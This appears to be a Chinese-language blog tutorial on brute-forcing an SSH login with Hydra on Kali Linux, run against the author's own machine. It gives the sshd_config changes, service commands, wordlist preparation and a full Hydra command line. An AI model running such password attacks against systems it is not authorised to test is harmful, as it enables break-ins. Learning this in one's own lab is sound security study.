ssh 連線 暴力破解密碼

說明

Secure Shell(ssh) 是一種連線網路傳輸協定，用來遠端登入機器，並且可像終端一樣操控它
這次要使用 Hydra 滲透工具來暴力破解 ssh 密碼

Kali Linux 已經安裝 Hydra，以下範例會使用 kali linux 系統破解自己系統的 ssh 密碼

hail hydra

啟動 ssh

首先編輯 /etc/ssh/sshd_config 檔案
將以下兩行註解 # 拿掉

/etc/ssh/sshd_config

PermitRootLogin prohibit-password
PasswordAuthentication yes

接下來在終端輸入指令

終端

啟動 ssh
$ sudo /etc/init.d/ssh start

查看 ssh 服務狀態
$ netstat -antp

設定以後開機啟動 ssh
$ sudo update-rc.d ssh enable

測試 ssh 是否可以連線

終端

查自己的 IP
輸出內容，192.168.x.x 就是自己的 IP
每台電腦 IP 都不同
$ ip addr

查到 IP 後就可以使用 ssh 指令或用 PuTTY 連線登陸
IP 輸入剛剛查的192.168.x.x
使用者和密碼輸入登入 kali 的使用者名稱和密碼

登入成功就會看到 $ 提示輸入指令

啟動 Hydra

kali linux 已經安裝 Hydra，在 kali linux 打開終端操作即可
假設密碼為 kali，使用字典來示範暴力破解
因為密碼是 kali，這字典需要有 kali 這個單字
先複製 kali 提供的字典 /usr/share/wordlists/dirb/small.txt 到家目錄

終端

先複製 kali 提供的字典 /usr/share/wordlists/dirb/small.txt 到家目錄
$ cp /usr/share/wordlists/dirb/small.txt ~/small.txt

假設密碼為 kali，使用字典來示範暴力破解
因為密碼是 kali，這字典需要有 kali 這個單字
編輯 ~/small.txt 在隨便一行新增 kali 單字

開始暴力破解
-l 指定用戶名，假設用戶名是 kali
-P 指定密碼字典
-t 指定執行緒數量
-v 顯示詳細內容
-f 找到一個密碼後停止
$ hydra 192.168.x.x ssh -l kali -P ~/small.txt -t 6 -v -f

如果有看到綠色顯示用戶名和密碼，就是成功找到了

其他 Hydra 使用方法可以參考官方網站

參考

極黑駭客專用的 OS：Kali Linux2 無差別全網滲透